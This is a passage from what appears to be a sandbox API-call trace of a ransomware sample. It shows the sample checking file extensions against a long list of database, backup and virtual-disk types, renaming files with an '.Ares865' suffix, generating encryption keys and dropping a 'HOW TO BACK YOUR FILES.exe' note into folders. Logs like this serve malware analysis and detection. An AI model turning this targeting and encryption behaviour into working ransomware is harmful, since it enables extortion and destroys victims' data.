lpString2="ns3") returned -1 [0043.665] lstrlenW (lpString="ns4") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0043.665] lstrlenW (lpString="nsf") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0043.665] lstrlenW (lpString="nv") returned 2 [0043.665] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0043.665] lstrlenW (lpString="nv2") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0043.665] lstrlenW (lpString="nwdb") returned 4 [0043.665] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0043.665] lstrlenW (lpString="nyf") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0043.665] lstrlenW (lpString="odb") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0043.665] lstrlenW (lpString="odb") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0043.665] lstrlenW (lpString="oqy") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0043.665] lstrlenW (lpString="ora") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0043.665] lstrlenW (lpString="orx") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0043.665] lstrlenW (lpString="owc") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0043.665] lstrlenW (lpString="p96") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0043.665] lstrlenW (lpString="p97") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0043.665] lstrlenW (lpString="pan") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0043.665] lstrlenW (lpString="pdb") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0043.666] lstrlenW (lpString="pdm") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0043.666] lstrlenW (lpString="pnz") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0043.666] lstrlenW (lpString="qry") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0043.666] lstrlenW (lpString="qvd") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0043.666] lstrlenW (lpString="rbf") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0043.666] lstrlenW (lpString="rctd") returned 4 [0043.666] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0043.666] lstrlenW (lpString="rod") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0043.666] lstrlenW (lpString="rodx") returned 4 [0043.666] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0043.666] lstrlenW (lpString="rpd") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0043.666] lstrlenW (lpString="rsd") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0043.666] lstrlenW (lpString="sas7bdat") returned 8 [0043.666] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0043.666] lstrlenW (lpString="sbf") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0043.666] lstrlenW (lpString="scx") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0043.666] lstrlenW (lpString="sdb") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0043.666] lstrlenW (lpString="sdc") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0043.666] lstrlenW (lpString="sdf") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0043.666] lstrlenW (lpString="sis") returned 3 [0043.666] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0043.666] lstrlenW (lpString="spq") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0043.667] lstrlenW (lpString="te") returned 2 [0043.667] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0043.667] lstrlenW (lpString="teacher") returned 7 [0043.667] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0043.667] lstrlenW (lpString="tmd") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0043.667] lstrlenW (lpString="tps") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0043.667] lstrlenW (lpString="trc") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0043.667] lstrlenW (lpString="trc") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0043.667] lstrlenW (lpString="trm") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0043.667] lstrlenW (lpString="udb") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0043.667] lstrlenW (lpString="udl") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0043.667] lstrlenW (lpString="usr") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0043.667] lstrlenW (lpString="v12") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0043.667] lstrlenW (lpString="vis") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0043.667] lstrlenW (lpString="vpd") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0043.667] lstrlenW (lpString="vvv") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0043.667] lstrlenW (lpString="wdb") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0043.667] lstrlenW (lpString="wmdb") returned 4 [0043.667] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0043.667] lstrlenW (lpString="wrk") returned 3 [0043.667] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0043.668] lstrlenW (lpString="xdb") returned 3 [0043.668] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0043.668] lstrlenW (lpString="xld") returned 3 [0043.668] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0043.668] lstrlenW (lpString="xmlff") returned 5 [0043.668] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0043.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\desktop.ini.Ares865") returned 44 [0043.668] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\pictures\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0043.669] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\pictures\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0043.669] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=380) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0043.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0043.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0043.669] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0043.670] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0043.670] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0043.670] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x120 [0043.672] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0043.672] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0043.672] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0043.672] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc348 [0043.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc348 | out: hHeap=0x2b0000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cc348 [0043.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0043.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc348 | out: hHeap=0x2b0000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0043.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0043.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0043.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0043.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0043.673] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0043.673] CloseHandle (hObject=0x120) returned 1 [0043.673] CloseHandle (hObject=0x12c) returned 1 [0043.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0043.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0043.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0043.675] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496c03c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0043.675] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0043.675] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="aoldtz.exe") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="bootmgr") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="temp") returned -1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="pagefile.sys") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="boot") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="ids.txt") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="perflogs") returned 1 [0043.675] lstrcmpiW (lpString1="Sample Pictures", lpString2="MSBuild") returned 1 [0043.675] lstrlenW (lpString="Sample Pictures") returned 15 [0043.675] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0043.676] lstrcpyW (in: lpString1=0x2cce432, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0043.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22a0 [0043.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2d1ea0 [0043.676] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22a8 | out: ListHead=0x2e7710, ListEntry=0x2d22a8) returned 0x2e7c50 [0043.676] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0043.676] FindClose (in: hFindFile=0x2cce68 | out: hFindFile=0x2cce68) returned 1 [0043.676] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d22a8 [0043.676] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0043.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0043.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22a0 | out: hHeap=0x2b0000) returned 1 [0043.676] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures") returned 40 [0043.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0043.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0043.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0043.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0043.676] GetLastError () returned 0x0 [0043.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0043.677] ReadFile (in: hFile=0x154, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0043.677] CloseHandle (hObject=0x154) returned 1 [0043.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0043.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.677] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cce68 [0043.677] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.677] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0043.677] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.677] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.677] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.677] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0043.677] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.677] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.677] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="aoldtz.exe") returned 1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".") returned 1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="..") returned 1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="windows") returned -1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="bootmgr") returned 1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="temp") returned -1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="pagefile.sys") returned -1 [0043.677] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="boot") returned 1 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ids.txt") returned -1 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ntuser.dat") returned -1 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="perflogs") returned -1 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="MSBuild") returned -1 [0043.678] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0043.678] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 42 [0043.678] lstrcpyW (in: lpString1=0x2cce452, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0043.678] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0043.678] lstrlenW (lpString="Ares865") returned 7 [0043.678] lstrcmpiW (lpString1="mum.jpg", lpString2="Ares865") returned 1 [0043.678] lstrlenW (lpString=".dll") returned 4 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".dll") returned 1 [0043.678] lstrlenW (lpString=".lnk") returned 4 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".lnk") returned 1 [0043.678] lstrlenW (lpString=".ini") returned 4 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".ini") returned 1 [0043.678] lstrlenW (lpString=".sys") returned 4 [0043.678] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".sys") returned 1 [0043.678] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0043.678] lstrlenW (lpString="bak") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0043.678] lstrlenW (lpString="ba_") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0043.678] lstrlenW (lpString="dbb") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0043.678] lstrlenW (lpString="vmdk") returned 4 [0043.678] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0043.678] lstrlenW (lpString="rar") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0043.678] lstrlenW (lpString="zip") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0043.678] lstrlenW (lpString="tgz") returned 3 [0043.678] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0043.678] lstrlenW (lpString="vbox") returned 4 [0043.678] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0043.679] lstrlenW (lpString="vdi") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0043.679] lstrlenW (lpString="vhd") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0043.679] lstrlenW (lpString="vhdx") returned 4 [0043.679] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0043.679] lstrlenW (lpString="avhd") returned 4 [0043.679] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0043.679] lstrlenW (lpString="db") returned 2 [0043.679] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0043.679] lstrlenW (lpString="db2") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0043.679] lstrlenW (lpString="db3") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0043.679] lstrlenW (lpString="dbf") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0043.679] lstrlenW (lpString="mdf") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0043.679] lstrlenW (lpString="mdb") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0043.679] lstrlenW (lpString="sql") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0043.679] lstrlenW (lpString="sqlite") returned 6 [0043.679] lstrcmpiW (lpString1="um.jpg", lpString2="sqlite") returned 1 [0043.679] lstrlenW (lpString="sqlite3") returned 7 [0043.679] lstrcmpiW (lpString1="mum.jpg", lpString2="sqlite3") returned -1 [0043.679] lstrlenW (lpString="sqlitedb") returned 8 [0043.679] lstrcmpiW (lpString1="emum.jpg", lpString2="sqlitedb") returned -1 [0043.679] lstrlenW (lpString="xml") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0043.679] lstrlenW (lpString="$er") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0043.679] lstrlenW (lpString="4dd") returned 3 [0043.679] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0043.679] lstrlenW (lpString="4dl") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0043.680] lstrlenW (lpString="^^^") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0043.680] lstrlenW (lpString="abs") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0043.680] lstrlenW (lpString="abx") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0043.680] lstrlenW (lpString="accdb") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accdb") returned 1 [0043.680] lstrlenW (lpString="accdc") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accdc") returned 1 [0043.680] lstrlenW (lpString="accde") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accde") returned 1 [0043.680] lstrlenW (lpString="accdr") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accdr") returned 1 [0043.680] lstrlenW (lpString="accdt") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accdt") returned 1 [0043.680] lstrlenW (lpString="accdw") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accdw") returned 1 [0043.680] lstrlenW (lpString="accft") returned 5 [0043.680] lstrcmpiW (lpString1="m.jpg", lpString2="accft") returned 1 [0043.680] lstrlenW (lpString="adb") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0043.680] lstrlenW (lpString="adb") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0043.680] lstrlenW (lpString="ade") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0043.680] lstrlenW (lpString="adf") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0043.680] lstrlenW (lpString="adn") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0043.680] lstrlenW (lpString="adp") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0043.680] lstrlenW (lpString="alf") returned 3 [0043.680] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0043.681] lstrlenW (lpString="ask") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0043.681] lstrlenW (lpString="btr") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0043.681] lstrlenW (lpString="cat") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0043.681] lstrlenW (lpString="cdb") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0043.681] lstrlenW (lpString="ckp") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0043.681] lstrlenW (lpString="cma") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0043.681] lstrlenW (lpString="cpd") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0043.681] lstrlenW (lpString="dacpac") returned 6 [0043.681] lstrcmpiW (lpString1="um.jpg", lpString2="dacpac") returned 1 [0043.681] lstrlenW (lpString="dad") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0043.681] lstrlenW (lpString="dadiagrams") returned 10 [0043.681] lstrcmpiW (lpString1="themum.jpg", lpString2="dadiagrams") returned 1 [0043.681] lstrlenW (lpString="daschema") returned 8 [0043.681] lstrcmpiW (lpString1="emum.jpg", lpString2="daschema") returned 1 [0043.681] lstrlenW (lpString="db-journal") returned 10 [0043.681] lstrcmpiW 